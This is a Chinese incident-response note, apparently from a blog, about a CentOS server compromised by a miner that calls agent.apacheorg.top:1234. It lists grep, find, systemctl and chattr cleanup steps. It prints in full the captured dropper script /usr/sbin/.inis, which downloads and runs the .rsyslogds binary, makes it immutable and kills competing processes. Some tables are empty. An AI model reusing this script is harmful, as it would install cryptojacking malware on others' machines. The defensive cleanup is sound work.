服务器被 入侵了 不停的访问 http://agent.apacheorg.top:1234 地址。
1.查了一下所有敏感目录下,有这个字符串的文件。
2.挨个看,发现木马的维护程序.inis ,然后AI分析,
3.一键给出处理方式,按照步骤操作就行,删文件,删定时任务,杀进程等.
4.查看开机服务
centos 服务器重要位置查找一些字符串
grep -r ":1234" /root /home /tmp /var/tmp /etc/cron* /etc/init.d /usr/sbin /usr/local/bin 2>/dev/null find /tmp /var/tmp /usr/sbin -name ".rsyslogds*" -type f 2>/dev/null
# 搜索所有常见文本配置/脚本文件,排除虚拟目录和二进制文件 grep -r --include="*.{sh,py,pl,js,json,yml,yaml,conf,cfg,txt,log,ini,bashrc,bash_profile}" \ --exclude-dir={proc,sys,dev,run,tmp,var/cache,usr/share,lib,lib64,bin,sbin} \ ":1234" / 2>/dev/null
grep -r ":1234" \ /etc \ /root \ /home \ /var/spool/cron \ /etc/cron.d \ /etc/cron.hourly \ /usr/local/bin \ /opt \ 2>/dev/null
grep -r ":1234" /etc /root /home /tmp /var/tmp /usr/sbin /usr/local 2>/dev/null
服务器发现的木马脚本
[root@ecs-49ca cron.d]# cat /usr/sbin/.inis #!/bin/bash if ! [ -z "$(command -v wdl)" ] ; then DLB="wdl -O " ; fi ; if ! [ -z "$(command -v wge)" ] ; then DLB="wge -O " ; fi if ! [ -z "$(command -v wget2)" ] ; then DLB="wget2 -O " ; fi ; if ! [ -z "$(command -v wget)" ] ; then DLB="wget -O " ; fi if ! [ -z "$(command -v cdl)" ] ; then DLB="cdl -Lk -o " ; fi ; if ! [ -z "$(command -v cur)" ] ; then DLB="cur -Lk -o " ; fi if ! [ -z "$(command -v curl2)" ] ; then DLB="curl2 -Lk -o " ; fi ; if ! [ -z "$(command -v curl)" ] ; then DLB="curl -Lk -o " ; fi echo $DLB if [ -w /usr/sbin ]; then SPATH=/usr/sbin else SPATH=/tmp fi kill(){ ps aux | grep -v '.rsyslogds' |grep -v '.libs'| grep -v grep | awk '{if($3>50.0) print $2}' | while read procid do kill -9 $procid done } while true; do ipurl="http://agent.apacheorg.top:1234" MD5_1_XMR = `curl -fsSL $ipurl/v||wget -q -O - $ipurl/v` MD5_2_XMR=`md5sum $SPATH/.rsyslogds | awk '{print $1}'` if [ "$MD5_1_XMR" = "$MD5_2_XMR" ]; then if [ $(ps -aux|grep '.rsyslogds'|grep -v grep|wc -l) -eq '0' ];then $SPATH/.rsyslogds else echo "ok" fi else $DLB $SPATH/.rsyslogds $ipurl/.rsyslogds;chmod +x $SPATH/.rsyslogds;$SPATH/.rsyslogds chattr +ai $SPATH/.rsyslogds fi kill sleep 1m done
systemctl list-unit-files --type=service --state=enabled
crond.service enabled sshd.service enabled .rsyslogds.service enabled ← ⚠️ 可疑!
#检查是否有隐藏/伪装服务 ls -la /etc/systemd/system/*.service /usr/lib/systemd/system/*.service 2>/dev/null # 重点检查非标准名称(如带点、下划线、随机名) ls -la /etc/systemd/system/ | grep -E "\.(service|socket|timer)$"
#查找一个服务的路径地址
systemctl show mybackdoor.service -p FragmentPath
文件加了属性,删除不了
这是一串 15 位字符,表示文件的属性。我们来逐位解释:
| 位置 | 字符 | 含义 |
|---|---|---|
i 属性 = 不可修改、不可删除!i 属性的作用:chattr -i 才能取消这个保护修改属性chattr -i /usr/sbin/.rsyslogds
修改属性 chattr -a /usr/sbin/.rsyslogds
rm -f /usr/sbin/.rsyslogds
查看属性lsattr /usr/sbin/.rsyslogds
能否帮我些一个 全面查找木马字符串 的 命令
当然可以!以下是一个 安全、高效、全面 的命令,用于在 CentOS 系统中查找与木马相关的可疑字符串(如 :1234、agent.apacheorg.top、xmss、.rsyslogds 等),不会卡死系统,并聚焦于攻击者最可能藏匿的位置
# 定义要搜索的关键词(可按需扩展) KEYWORDS=":1234\|agent\.apacheorg\.top\|xmss\|\.rsyslogds\|\.inis\|oanacroner1\|192\.210\.200\.66" # 安全扫描:只查文本类文件 + 关键目录 + 跳过虚拟/二进制路径 grep -rE --include="*.{sh,py,pl,js,json,yml,yaml,conf,cfg,txt,log,ini,bashrc,bash_profile}" \ --exclude-dir={proc,sys,dev,run,tmp,var/cache,usr/share,lib,lib64,bin,sbin} \ "$KEYWORDS" \ /etc /root /home /var/spool/cron /etc/cron* /usr/sbin /usr/local/bin /opt 2>/dev/null
| 部分 | 作用 |
|---|---|
此内容由惯性聚合(RSS阅读器)自动聚合整理,仅供阅读参考。 原文来自 — 版权归原作者所有。